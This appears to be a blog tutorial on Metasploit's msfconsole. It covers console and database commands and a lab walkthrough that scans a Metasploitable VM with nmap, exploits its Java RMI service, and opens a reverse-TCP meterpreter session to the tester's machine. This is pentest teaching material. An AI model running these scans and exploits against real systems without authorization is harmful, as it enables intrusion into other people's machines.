Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.
Source: “Metasploit The Penetration Tester’s Guide“
Msfconsole is really an interactive shell with which you can work with the metasploit framework dynamically & easily. As said above we can exploit all the functionalities of the metasploit framework with this interactive shell. The most amazing feature is that, even if the core framework changes(gets updated or changes in modules)the msfconsole adjusts dynamically with a whole lot of features like help system, a search command, ability to create & manage users, databases, workspaces, hosts, vulnerabilities etc. We can see the information & documentation for a module, see matching payloads and of course run the exploit in an interactive & easy way.
Some more terms & Concepts related to Metasploit & the MSFConsole
- Database: A dedicated database for management of information like hosts, ip adderesses, ranges, vulnerabilities etc. Typically & usefully we can create a new database for each of our pentesting projects. Default is the postgresql.
- DB-User : Guess what…? The user who is using the database. This becomes very handy while integrating with the web interface.
- Workspace: Kind of like an exclusive space for each projects. Really helpful for managing the data of your projects. Creating new project in Web-UI creates new workspace in console.
For all these labs, we need some machines. You can use VMs or Physical Machines. For most of the labs I am using metasploitable. It has got a number of vulnerable services, exclusively made for learning Pentesting. I suggest you download it, & work with it. Setup the network so that, your Kali Linux Box & the Metasploitable Box are in same network.
Download Link: http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Options
Core Commands =============    Command      Description    -------      -----------    ?            Help menu    back         Move back from the current context    banner       Display an awesome metasploit banner    cd           Change the current working directory    color        Toggle color    connect      Communicate with a host    edit         Edit the current module with $VISUAL or $EDITOR    exit         Exit the console    get          Gets the value of a context-specific variable    getg         Gets the value of a global variable    go_pro       Launch Metasploit web GUI    grep         Grep the output of another command    help         Help menu    info         Displays information about one or more module    irb          Drop into irb scripting mode    jobs         Displays and manages jobs    kill         Kill a job    load         Load a framework plugin    loadpath     Searches for and loads modules from a path    makerc       Save commands entered since start to a file    popm         Pops the latest module off the stack and makes it active    previous     Sets the previously loaded module as the current module    pushm        Pushes the active or list of modules onto the module stack    quit         Exit the console    reload_all   Reloads all modules from all defined module paths    rename_job   Rename a job    resource     Run the commands stored in a file    route        Route traffic through a session    save         Saves the active datastores    search       Searches module names and descriptions    sessions     Dump session listings and display information about sessions    set          Sets a context-specific variable to a value    setg         Sets a global variable to a value    show         Displays modules of a given type, or all modules    sleep        Do nothing for the specified number of seconds    spool        Write console output into a file as well the screen    threads      View and manipulate background threads    unload       Unload a framework plugin    unset        Unsets one or more context-specific variables    unsetg       Unsets one or more global variables    use          Selects a module by name    version      Show the framework and console library version numbers Database Backend Commands =========================    Command          Description    -------          -----------    creds            List all credentials in the database    db_connect       Connect to an existing database    db_disconnect    Disconnect from the current database instance    db_export        Export a file containing the contents of the database    db_import        Import a scan result file (filetype will be auto-detected)    db_nmap          Executes nmap and records the output automatically    db_rebuild_cache Rebuilds the database-stored module cache    db_status        Show the current database status    hosts            List all hosts in the database    loot             List all loot in the database    notes            List all notes in the database    services         List all services in the database    vulns            List all vulnerabilities in the database    workspace        Switch between database workspaces
Lab : Initial Setups
Now we are going to create a new database, user & a workspace for our new project.
Note: If you have knowledge of msfconsole & have worked with it before, proceed to Step 6.
Step 1 : Do a host discovery & perform an Enumeration.
First of all we have to identify the devices present on the network & identify our tharget. The process is to do an arp scan/nbtscan/netdiscover to discover hosts & then find open services. Obviously the system with a lot of unusual ports open is the most vulnerable.
Host Discovery: The following sends out a bunch of arp requests & shows us the responce from hosts present on the network.
Command: arp-scan 192.168.0.1/24<Enter your network Range>
Simple Service identification: The following just identifies all ports & services open on all hosts present on the network.
Command: nmap -sS 192.168.0.1/24 -v
Narrow our Focus: From the above result choose your target. For now I have chosen 192.168.0.104 which has got a lot of open ports. The following Nmap command performs an automatic enumeration script scanning on the specified target. We can identify the exact versions & enumerate services running on the host using the following
Command: nmap -sS -A 192.168.0.104 -vv
Step 2: Meanwhile, Setup msfconsole.
The script scanning can take a lot of time depending upon the options we specify. The above command might take 5-10 minutes in average. Meanwhile we can setup msfconsole for our project. Now this step is not necessarily essential, but it helps to stay organized. Open up a new terminal & do the following.
Start Service: Skip if you have it enabled at boot.
Command: service postgresql start
Switch to postgress & create a new database & user
Command:su postgress
command: createuser msfuser1 -P <replace "msfuser1" with your username>
Give password 2 times. Here I have given ” admin”as password. Remember to make it complex if you are serious.
Set the user as superuser & Create a database
Command: createdb msfproj1 --owner=msfuser1 <replace "msfproj1" with your database name & "msfuser1" with your username>
Command: exit
Start the msfconsole
Command: msfconsole
Step 3: Connect to new user & DB in msfconsole & Create new Workspace
Disconnect the default DB & user and connect our newly created user & DB
msf> db_disconnect msf> db_connect msfuser1:admin@localhost/msfproj1
The syntax for above is
db_connect user:pass@host/dbname
If you have an error, see help by db_connect -h. After this you can see the database being populated & caches being rebuild.
To see the current workspace,
msf> workspace
Add a new workspace & switch to it.
msf> workspace -a newproject <replace with your deesired name> msf> workspace "newproject"
Now just check everything.
msf> db_status msf> workspace
Remember to seek help if you got error by giving the command followed by “-h”. If everything is OK, lets proceed.
Step 4: Populate the hosts & services to metasploit db.
This is one of the cool features of msfconsole. You can add hosts,services & vulnerabilities to the database. We can run nmap from within msfconsole. All the results are stored in the database also. Lets see it in action.
Issue an nmap scan agian within msfconsole. Here only difference is we use db_nmap instead of the regular command.
msf> db_nmap -sS 192.168.0.1/24 -vv
This populates hosts & services. We will see vulns in later tutorials. After the execution finishes, see the results.
Now, see the hosts & services currently present in the database.
msf> hosts msf> services
Thats enough, lets’ get to the real attack.
Step 5: Identify a vulnerable service.
Now, this step is not as it should be. I haven’t described vulnerability analysis because it would make the post too long. We will discuss this step in detail on later tutorials. For now we exploit a service “java_rmi_server”. Java RMI is Java Remote Method Invocation which allows to connect between different java objects on different hosts. Our target has a vulnerable version of it. So lets just exploit it.
More About Java RMI: http://docs.oracle.com/javase/7/docs/technotes/guides/rmi/
To identify java_rmi_server, look at the nmap report we did first.
Step 6 : Search & Use Module in msfconsole.
msf> search java_rmi msf> info exploit/multi/misc/java_rmi_server msf> use exploit/multi/misc/java_rmi_server
Now you can see the prompt has changed. We can see the options by
>show options
Set the RHOST which is our target which is running the vulnerable service.
set RHOST 192.168.0.104
Remember to set all options which have a “Required YES” value. See the table of options. Also check if the RPORT is also correct. Check the nmap result & the currently set Port and see if it matches.
Next We have to set all the required options & a payload. First we have to search for compatible payloads. All payloads may not be compatible with current module.
>show payloads
Then for setting it, copy the path & issue:
>set PAYLOAD java/meterpreter/reverse_tcp
Meterpreter is a state of the art payload. We can have lot of fun with this powerful payload. We will discuss that later.
Now set the LHOST, which is the machine to which the payload has to return connection. Remember to give the full ip address instead of localhost or 127.0.0.1 etc
set LHOST 192.168.0.103
If you want, you can change the listening Port
set LPORT 4445
All set, now
>exploit
Now that we are in the meterpreter, we have successfully exploited a service and gained access to our victim. There are a whole lot of options you can do with meterpreter. For now lets’ try simple commands.
meterpreter> ifconfig meterpreter>getuid
You can play around with meterpreter, try the help section by issuing “help”. Try for yourself.
Step 7: Brief it UP.
As this post got a bit lengthy, I have included a screenshot of the procedure very briefly.
We will see more on advanced vulnerability analysis & finding more exploits in real machines in later tutorials.
Hope you learned something new, Please Give feed Back. Comment & Follow us. Your Feedback is the innovation for us.
